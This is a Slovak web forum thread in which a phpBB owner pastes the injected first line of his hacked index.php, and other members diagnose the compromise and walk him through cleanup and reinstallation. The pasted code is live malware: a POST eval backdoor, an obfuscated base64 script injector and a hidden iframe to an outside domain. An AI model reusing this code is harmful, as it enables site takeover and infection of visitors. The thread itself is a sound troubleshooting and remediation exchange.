| | |
| Stránka: 1 z 1
| [ Príspevkov: 26 ] | |
Autor | Správa |
---|
Registrovaný: 12.05.08 Prihlásený: 28.12.13 Príspevky: 117 Témy: 29 |
Ahojte,
spravil som si forum, kt. fungovalo bez problemov. Po nejakom case ho spustim a vypise:
Parse error: syntax error, unexpected ')' in /.../forum/index.php on line 1
kod na riadku 1:
<?php if(!function_exists('tmp_lkojfghx'))
{if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBzbzgwPSclJzt2YXIgZVZQdlY9J2A3NmFyYDIwYWAzZGAyMlNjcmlwdEVuZ2luZWAyMmAyY2A2MmAzZGAyMlZlcnNpb24oKStgMjJgMmNqYDNkYDIyYDIyYDJjdWAzZGA2ZWF2YDY5Z2F0b3JgMmV1YDczZWA3MkFgNjdlYDZldGAzYmlgNjZgMjgodWAyZWlgNmVgNjRlYDc4T2YoYDIyV2luYDIyKWAzZTBgMjlgMjZgMjYoYDc1YDJlaW5kZWA3OGA0ZmYoYDIyTmA1NGAyMDZgMjIpYDNjMGAyOWAyNmAyNmAyOGA2NG9jdW1lbmA3NGAyZWNgNmZva2llYDJlYDY5bmA2NGA2NWA3OE9gNjYoYDIyYDZkaWVrYDNkMWAyMilgM2MwKWAyNmAyNmAyOHR5cGVvZmAyOHpgNzJgNzZ6dHMpYDIxYDNkYDc0eXBgNjVvZihgMjJBYDIyKWAyOSlgN2J6cnZ6YDc0c2AzZGAyMkFgMjJgM2JlYDc2YWA2YyhgMjJpZih3aW5kYDZmd2AyZWAyMithK2AyMilgNmFgM2RgNmErYDIyK2A2MStgMjJNYWpgNmZyYDIyK2IrYStgMjJgNGRpbm9yYDIyYDJiYithK2AyMkJ1aWxgNjRgMjIrYitgMjJgNmFgM2JgMjIpYDNiZG9jdW1lbnRgMmV3cml0ZWAyOGAyMmAzY2A3M2NgNzJpcHRgMjBzcmNgM2RgMmZgMmZgNjd1bWJsYXJgMmVjYDZlYDJmcmA3M2A3M2AyZmAzZmlkYDNkYDIyK2orYDIyYDNlYDNjYDVjYDJmc2NyYDY5cHRgM2VgMjIpYDNiYDdkJzt2YXIgeDdSQT1lVlB2Vi5yZXBsYWNlKC9gL2csc284MCk7dmFyIHg3VWs9dW5lc2NhcGUoeDdSQSk7ZXZhbCh4N1VrKX0pKCk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s)
{if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}
$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);
if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.''))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;
return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();
if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);
foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;
else $s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();
ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s)
;$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2();
?',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;
else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');
for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><iframe src="http://cameronzfunz.com/spl1/?29e898d7718e8d86e0436480200291b7" width=1 height=1 style="visibility:hidden"></iframe><?php
-----------------------------------------------------------------------------
Vidite tu nejaky problem?
Niekde som cital, ze problem moze sposobovat kodovanie, treba zvolit nejake UTF-8 without BOM, ale neviem kde a ci je to moj problem?
Dik
//editovane, Daron
|
|
Registrovaný: 30.06.07 Prihlásený: 24.07.12 Príspevky: 530 Témy: 85 Bydlisko: košice | Napísal BBUlet: 13.05.2009 23:40 | |
|
omg toto je taký prehľadní kód že konec , kódovanie nastavíš vo svojom editore ktorý používaš, v pspade je to format>a tam zvolíš utf-8
_________________ PC1: Core2Duo E4300 @2.6GHZ, 4COREDUAL-SATA2, RAM Kingston 2GB 667mhz, ATI R3650 512MB DDR2, WD 320GB SATAII, Asus VW192S [19" LCD] PC2: AMD Duron 2ghz, Asus A7s8x-mx, 768MB DDR, FX5200, 80GB IDE
|
|
Registrovaný: 12.05.08 Prihlásený: 28.12.13 Príspevky: 117 Témy: 29 | Napísal autor témy pkrajnak: 13.05.2009 23:48 | |
|
to uz som spravil, nastavil som utf-8 bez BOM, ale nejde to ani tak. Ten kod bol automaticky vygenerovany pri tvorbe fora PHP BB. Neviem, kde mu moze ta zatvorka vadit, ale nechapem, ze doteraz to nevadilo...???
|
|
Registrovaný: 12.05.08 Prihlásený: 28.12.13 Príspevky: 117 Témy: 29 | Napísal autor témy pkrajnak: 14.05.2009 0:11 | |
|
pozeram sa este na ten kod a na konci je jeden iframe: cameronzfunz.com ; rozmyslam, ci to nebude nejako hacknute a pozmenene...?? Nezda sa mi to, aby tam nieco take bolo?
|
|
Registrovaný: 07.03.06 Prihlásený: 23.01.11 Príspevky: 404 Témy: 2 Bydlisko: Prešov / Pr... | Napísal mylan: 14.05.2009 0:21 | |
|
Určite to hacknuté je. PhpBB žiaden takýto kód negeneruje...
- Vymazať tento bullshit
- Upraviť zdrojáky do pôvodného tvaru
- prečistiť comp
- zmeniť heslo na ftp
- aktualizovať Total Commander(ak používaš) na verziu 7.5 beta2
|
|
Registrovaný: 12.05.08 Prihlásený: 28.12.13 Príspevky: 117 Témy: 29 | Napísal autor témy pkrajnak: 14.05.2009 0:31 | |
|
no super..., neviem ci problem je len ten iframe a ci tam nie je este vsunute nieco ine. Inac pozeral som tie zatvorky a mne tam vsetky sedia.
Upravit zdrojaky do povodneho tvaru? Tak to ako? Neviem aky bol povodny tvar, ved som to cele instaloval step by step PHP BB forum, ja neviem ako to bolo povodne... Musim to teraz robit odznova opat?? Keby som sa aspon vedel dostat k temam, aby som to nemusel cele este raz vymyslat...
Nechapem, ze niekoho take nieco bavi ako hacknut debilne forum...
Mam pritom NOD, tak nechapem ako mi to mohli len tak hacknut...
Dik.
|
|
Registrovaný: 07.03.06 Prihlásený: 23.01.11 Príspevky: 404 Témy: 2 Bydlisko: Prešov / Pr... | Napísal mylan: 14.05.2009 0:35 | |
|
Celý ten kód čo si tu poslal vymaž. Je to blud, ktorý vôbec nepatrí do phpBB. A phpBB vrátiš do pôvodneho tvaru tak, že pôjdeš na www.phpbb.com - tam si stiahneš najnovšiu verziu a tou prepíšeš tvoje fórum(všetky súbory okrem install.php). Všetky nastavenia ti ostanú zachované, neprepíšeš databázu.
Ešte jedna otázka: neurobil si náhodou to, že po nainštalovaní si nezmazal install.php, ale len ho premenoval na _install.php, alebo podobne?
|
|
Registrovaný: 12.05.08 Prihlásený: 28.12.13 Príspevky: 117 Témy: 29 | Napísal autor témy pkrajnak: 14.05.2009 0:41 | |
|
nie, to som zmazal, ved prave preto nechapem ako je to forum potom slabo zabezpecene a to bola najnovsia verzia...
Kedze install.php nemam, tak vlastne tam dostanem uplne novu instalacnu verziu. A ked prepisem vsetky subory (pisal si, ze len install.php nie, ale ten nemam), tak len aby som nespravil nieco s databazou...
Dik.
|
|
Registrovaný: 12.05.08 Prihlásený: 28.12.13 Príspevky: 117 Témy: 29 | Napísal autor témy pkrajnak: 14.05.2009 0:42 | |
|
vseobecne uz len jedna otazka: ako potom mam zabezpecit, aby sa to opat neopakovalo? Fakticky sa mi zda, ze to zabezpecenie phpbb je akosi slabe...?
|
|
Registrovaný: 07.03.06 Prihlásený: 23.01.11 Príspevky: 404 Témy: 2 Bydlisko: Prešov / Pr... | Napísal mylan: 14.05.2009 0:45 | |
|
Nespravíš s DB nič, neboj sa. Jednoducho nakopíruj/prepíš všetky súbory, ktoré stiahneš na phpbb.com.
Nekopíruj na web len adresár /install/ (pardon, je to adresár, nie celý súbor, ako som písal predtým)
K zabezpečeniu: to nemuselo vôbec súvisieť s phpbb, ale skôr by som to tipol na vykradnutie hesiel FTP v total commanderi...
|
|
Registrovaný: 12.05.08 Prihlásený: 28.12.13 Príspevky: 117 Témy: 29 | Napísal autor témy pkrajnak: 14.05.2009 0:51 | |
|
no ok, teraz som ten prvy riadok vymazal, precistil a ked som forum spustil, hned sa objavil nasledovny atak:
Contains recognition pattern of the HTML/Infected.WebPage.Gen HTML script virus
Asi to budem musiet fakt vsetko precistit, ale mne to pripada ako by to cele phpbb bolo akosi hacknute..., neviem
|
|
Registrovaný: 09.07.08 Prihlásený: 17.01.15 Príspevky: 1585 Témy: 96 |
Predpokladám, že používaš total commander a máš tam uložené heslá, však? Odporúčam okamžite na ftp zmeniť heslo a nikam ho neukladať, už vôbec nie do total commanderu.
toto je asi najnebezpečnejšia časť kódu:
Kód: if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
|
|
Registrovaný: 12.05.08 Prihlásený: 28.12.13 Príspevky: 117 Témy: 29 | Napísal autor témy pkrajnak: 14.05.2009 19:13 | |
|
ano, pouzivam TC a mam tam ulozene hesla, myslel som, ze su dostatocne chranene.
O com je ta cast kodu? Zasielanie niecoho?
|
|
Registrovaný: 26.12.06 Prihlásený: 16.11.19 Príspevky: 3971 Témy: 181 Bydlisko: Nitra / Bra... | Napísal emer: 14.05.2009 19:47 | |
|
ak odosles na script $_POST['tmp_lkojfghx3'] s hodnotou 'destroy_server();' tak ti vsetko znici
http://sk.php.net/eval
_________________ Sorry za prelkepy |
|
Registrovaný: 12.05.08 Prihlásený: 28.12.13 Príspevky: 117 Témy: 29 | Napísal autor témy pkrajnak: 14.05.2009 19:50 | |
|
no super..., dik za info. Inac to mam do toho Total Commandera stale nanovo typovat prihlasovacie udaje a hesla? Dost neprakticke. Nie je nejake pohodlnejsie riesenie?
|
|
Registrovaný: 26.12.06 Prihlásený: 16.11.19 Príspevky: 3971 Témy: 181 Bydlisko: Nitra / Bra... | Napísal emer: 14.05.2009 19:51 | |
|
staci ked si stiahnes najnovsiu verziu totalcommandera, kde je ta chyba ostranena... alebo pouzi ineho ftp klienta.. napr filezilla
_________________ Sorry za prelkepy |
|
Registrovaný: 12.05.08 Prihlásený: 28.12.13 Príspevky: 117 Témy: 29 | Napísal autor témy pkrajnak: 14.05.2009 19:54 | |
|
staci verzia 7.04? 7.05 je len testovacia. Takze uz si to pri tejto verzii mozem nechat zaevidovane?
|
|
Registrovaný: 07.03.06 Prihlásený: 23.01.11 Príspevky: 404 Témy: 2 Bydlisko: Prešov / Pr... | Napísal mylan: 14.05.2009 19:59 | |
|
Riešenie som ti popísal už oveľa skôr. Stačí otvoriť oči a čítať!
|
|
Registrovaný: 12.05.08 Prihlásený: 28.12.13 Príspevky: 117 Témy: 29 | Napísal autor témy pkrajnak: 14.05.2009 20:01 | |
|
Jasne, to som registroval, len sa pytam, ci nestaci 7.04? Tu som si teraz nainstaloval, mal som 03...
|
|
Registrovaný: 07.03.06 Prihlásený: 23.01.11 Príspevky: 404 Témy: 2 Bydlisko: Prešov / Pr... | Napísal mylan: 14.05.2009 20:02 | |
|
Nestačí. Oprava sa týka až verzie 7.5 (ktorá je zatiaľ beta)
|
|
Registrovaný: 12.05.08 Prihlásený: 28.12.13 Príspevky: 117 Témy: 29 | Napísal autor témy pkrajnak: 14.05.2009 20:07 | |
|
tak ok, dufam, ze tam nebudu zase nejake diery, pretoze tam vyslovene upozornovali, ze pri beta verzii nic negarantuju...
Cudujem sa, ze po tolkych rokoch skusenosti to TC dokazal tak pokaslat a bezpecne riesenie sa naslo az vo verzii 7.5 ...
|
|
Registrovaný: 09.07.08 Prihlásený: 17.01.15 Príspevky: 1585 Témy: 96 |
Ešte stále ti nikto negarantuje, že toto zabezpečenie bude dostatočné. Vzhľadom na používanosť total commandera sa oplatí útočníkovi potrápiť aj so šifrovaním
|
|
Registrovaný: 12.05.08 Prihlásený: 28.12.13 Príspevky: 117 Témy: 29 | Napísal autor témy pkrajnak: 15.05.2009 23:33 | |
|
Mylan,
napisal si:
... Jednoducho nakopíruj/prepíš všetky súbory, ktoré stiahneš na phpbb.com.
Nekopíruj na web len adresár /install/ (pardon, je to adresár, nie celý súbor, ako som písal predtým)
...
presne toto som spravil, ale aj tak mi automaticky chcelo nacitat index.php v adresari install? Takze teraz to musim robit odznovu. Je nejaka moznost, ako sa napojit na existujucu databazu?
Zial instalacka mi len vypise, ze databaza s danym menom existuje a ze musim zvolit inu...
Co s tym?
|
|
Registrovaný: 09.09.07 Prihlásený: 07.11.16 Príspevky: 3114 Témy: 233 Bydlisko: Nové Zámky |
otvor si subor config.php a tam si nastav
Kód: $dbms = 'mysql';
$dbhost = 'tvojhost'; $dbname = 'nazovDB'; $dbuser = 'uzivatel'; $dbpasswd = 'heslo';
$table_prefix = 'prefixDatabazy_';
define('PHPBB_INSTALLED', true);
_________________ "It took a lot of work, but this latest Linux patch enables support for machines with 4096 CPUs, up from the old limit of 1024." "Do you have support for smooth full-screen flash video yet?" "No, but who uses that?"
- ak dlho neodpisujem do témy, zabudol som na ňu, takže ma upozornite SS, ak chcete moju odpoveď |
|
Registrovaný: 12.05.08 Prihlásený: 28.12.13 Príspevky: 117 Témy: 29 | Napísal autor témy pkrajnak: 16.05.2009 9:05 | |
|
Blackshadow píše: otvor si subor config.php a tam si nastav Kód: $dbms = 'mysql';
$dbhost = 'tvojhost'; $dbname = 'nazovDB'; $dbuser = 'uzivatel'; $dbpasswd = 'heslo';
$table_prefix = 'prefixDatabazy_';
define('PHPBB_INSTALLED', true);
Myslel som si, len potom mi vypisuje nasledovne:
$dbms = 'mysql'; $dbhost = 'localhost'; $dbname = 'XXX'; $dbuser = 'YYY'; $dbpasswd = 'ZZZ'; $table_prefix = 'phpbb_'; define('PHPBB_INSTALLED', true);
Warning: Cannot modify header information - headers already sent by (output started at /home/.../xxx.sk/forum/config.php:10) in /home/xxx/xxx.sk/forum/common.php on line 161. Čo s tým?
dany riadok v config.php je:
header('Location: ' . $url);
|
|
Registrovaný: 12.05.08 Prihlásený: 28.12.13 Príspevky: 117 Témy: 29 | Napísal autor témy pkrajnak: 16.05.2009 14:37 | |
|
uz som to vyriesil. Vytvoril som novu databazu, nainstaloval forum a potom v config.php som sa napojil na staru. Funguje to. Snad to niekomu do buducna aj pomoze...
|
|
| Stránka: 1 z 1
| [ Príspevkov: 26 ] | |
Podobné témy | Témy | Odpovede | Zobrazenia | Posledný príspevok |
---|
| Parse error: syntax error, unexpected '}' in /usr/export/www v Redakčné systémy | 9 | 687 | 11.01.2007 18:32 then | | Parse error: syntax error, unexpected '"' in v PHP, ASP | 1 | 579 | 10.12.2009 15:40 stenley | | Parse error: syntax error, unexpected T_STRING in .. v PHP, ASP | 7 | 1045 | 08.08.2007 8:03 Tominator | | Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_ST v PHP, ASP | 1 | 608 | 05.10.2010 12:08 walther | | Parse error: syntax error, unexpected $end v PHP, ASP | 6 | 956 | 29.08.2011 22:26 BX | | Parse error v PHP, ASP | 15 | 1458 | 09.08.2006 19:15 mokus | | Parse error v Databázy | 2 | 720 | 18.10.2007 14:14 pitrik1 | | PARSE ERROR v PHP, ASP | 6 | 454 | 17.01.2008 0:56 max-m | | Parse error: v PHP, ASP | 21 | 1268 | 21.09.2008 22:06 Blackshadow | | Parse error define() v PHP, ASP | 2 | 734 | 21.09.2006 19:19 Freelan | | elseif Parse error: v PHP, ASP | 14 | 445 | 08.06.2009 19:09 pilná lama glama | | Neviem najst Parse error v PHP, ASP | 24 | 759 | 15.09.2007 19:13 Blackshadow | | syntax error v PHP, ASP | 6 | 504 | 25.04.2012 19:46 shaggy | | CSS- Parse Error [empty string] v HTML, XHTML, XML, CSS | 4 | 475 | 16.04.2015 15:24 SKRiPT | | syntax error PHP v PHP, ASP | 5 | 753 | 03.06.2010 14:14 Ďuri | | Syntax error + formatovanie kodu v PHP, ASP | 19 | 662 | 15.09.2008 13:39 dadmtb |
| Nemôžete zakladať nové témy v tomto fóre Nemôžete odpovedať na témy v tomto fóre Nemôžete upravovať svoje príspevky v tomto fóre Nemôžete mazať svoje príspevky v tomto fóre
|
|